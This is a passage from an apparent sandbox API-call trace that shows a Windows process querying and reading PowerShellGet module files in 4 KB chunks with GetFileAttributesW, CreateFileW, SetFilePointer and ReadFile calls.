(x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0113.087] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Format.ps1xml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.format.ps1xml")) returned 0x20 [0113.092] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Format.ps1xml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.format.ps1xml")) returned 0x20 [0113.098] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Resource.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.resource.psd1")) returned 0x20 [0113.105] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Resource.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.resource.psd1")) returned 0x20 [0113.112] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGetModuleInfo.xml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5b [0113.112] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGetModuleInfo.xml", nBufferLength=0x5b, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x5a [0113.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d820) returned 1 [0113.112] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGetModuleInfo.xml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x5a0dae4 | out: lpFileInformation=0x5a0dae4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0113.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d81c) returned 1 [0113.114] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0113.190] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x55 [0113.190] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x55, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", lpFilePart=0x0) returned 0x54 [0113.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d348) returned 1 [0113.190] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1"), fInfoLevelId=0x0, lpFileInformation=0x2658544 | out: lpFileInformation=0x2658544*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499c9860, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea538e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea538e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8caa9)) returned 1 [0113.191] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d344) returned 1 [0113.191] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x55 [0113.191] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x55, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", lpFilePart=0x0) returned 0x54 [0113.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4ec) returned 1 [0113.191] CreateFileW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x408 [0113.192] GetFileType (hFile=0x408) returned 0x1 [0113.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e8) returned 1 [0113.192] GetFileType (hFile=0x408) returned 0x1 [0113.192] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x0 [0113.192] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.220] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x1000 [0113.220] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.251] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x2000 [0113.251] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.251] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x3000 [0113.252] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.252] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x4000 [0113.252] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.253] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x5000 [0113.253] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.253] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x6000 [0113.253] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.254] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x7000 [0113.254] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.254] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x8000 [0113.255] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.255] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x9000 [0113.255] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.256] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0xa000 [0113.256] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.257] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0xb000 [0113.257] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.257] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0xc000 [0113.257] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.258] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0xd000 [0113.258] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.259] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0xe000 [0113.259] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.259] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0xf000 [0113.259] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.260] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x10000 [0113.260] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.260] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x11000 [0113.260] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.265] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x12000 [0113.265] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.265] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x13000 [0113.266] ReadFile (in: hFile=0x408, lpBuffer=0x2659348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x2659348*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.356] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x14000 [0113.356] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.356] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x15000 [0113.356] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.357] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x16000 [0113.357] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.357] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x17000 [0113.357] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.357] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x18000 [0113.358] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.358] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x19000 [0113.358] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.358] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x1a000 [0113.358] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.359] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x1b000 [0113.359] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.359] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x1c000 [0113.359] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.359] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x1d000 [0113.359] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.360] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x1e000 [0113.360] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.360] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x1f000 [0113.360] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.361] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x20000 [0113.361] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.361] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x21000 [0113.361] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.361] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x22000 [0113.361] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.362] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x23000 [0113.362] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.362] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x24000 [0113.362] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.362] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x25000 [0113.363] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.363] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x26000 [0113.363] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.363] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x27000 [0113.363] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.364] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x28000 [0113.364] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.364] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x29000 [0113.364] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.365] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x2a000 [0113.365] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.365] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x2b000 [0113.365] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.366] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x2c000 [0113.366] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.366] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x2d000 [0113.366] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, 